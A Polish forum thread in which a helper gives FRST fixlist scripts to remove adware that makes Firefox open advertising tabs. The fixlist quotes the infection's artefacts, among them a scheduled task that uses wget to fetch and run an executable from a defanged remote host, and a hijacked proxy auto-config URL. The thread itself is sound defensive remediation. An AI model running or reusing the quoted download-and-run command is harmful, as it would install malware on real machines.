Firefox otwiera sam okna z reklamami

Dla specjalistów Bezpieczeństwo
#1

Od pewnego czasu mój Firefox otwiera nowe karty i wyświetla w nich reklamy.

#2

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist :

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TrayMenu.lnk [2014-07-14]
AutoConfigURL: [S-1-5-21-2952479433-1300601448-540749344-1001] = hxxp://stoppblock.me/wpad.dat?5c1b6d455b2b17a732482d9388d815fa3507038
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
URLSearchHook: [S-1-5-80-1770670200-1234090253-3451813168-4041049723-2370973757] UWAGA = Brak domyślnego URLSearchHook
URLSearchHook: [S-1-5-80-2872255330-672591203-888807865-2791174282-1554802921] UWAGA = Brak domyślnego URLSearchHook
URLSearchHook: [S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051] UWAGA = Brak domyślnego URLSearchHook
URLSearchHook: [S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582] UWAGA = Brak domyślnego URLSearchHook
URLSearchHook: [S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003] UWAGA = Brak domyślnego URLSearchHook
FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2016-03-04] [Brak podpisu cyfrowego]
S3 vmci; \SystemRoot\System32\drivers\vmci.sys [X]
S3 VMnetAdapter; \SystemRoot\system32\DRIVERS\vmnetadapter.sys [X]
C:\AdwCleaner
2015-08-10 16:41 - 2015-08-10 16:41 - 0000032 RSHOT () C:\Users\Rootka\AppData\Local\t65s2tb.dat
2015-08-12 20:06 - 2015-09-19 13:21 - 0000032 ____ H () C:\Users\Rootka\AppData\Local\t70rc.dat
Task: {096B6F9A-3804-4D52-AF8A-8995EE7C474E} - System32\Tasks\{412385D7-69A1-473A-93D9-84CCEF504C98} = pcalua.exe -a "C:\Program Files\Microsoft SQL Server\110\Setup Bootstrap\SQLServer2012\x64\SetupARP.exe"
Task: {EDF3A21A-FF42-4EDF-9EB9-F7688ADF4776} - System32\Tasks\SYSTEM = /R cd "C:\ProgramData" amp; ping 1.1.1.1 -n 300 -w 1000 amp; wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=Rj4bmoF003;PlatinumHideIP-3.3.2.6.Setup.exe;1439625734 amp; start cmd /R dat.bmp ==== UWAGA
RemoveProxy:
EmptyTemp:

Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.

 

#3

Fixlog.txt

FRST.txt

#4

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist :

S2 VBoxAswDrv; \??\C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [X]
S3 VBoxNetFlt; \SystemRoot\system32\DRIVERS\VBoxNetFlt.sys [X]
C:\Users\Rootka\.mongorc.js
DeleteQuarantine:

Uruchom FRST i kliknij Napraw (Fix). Skasuj folder C:\FRST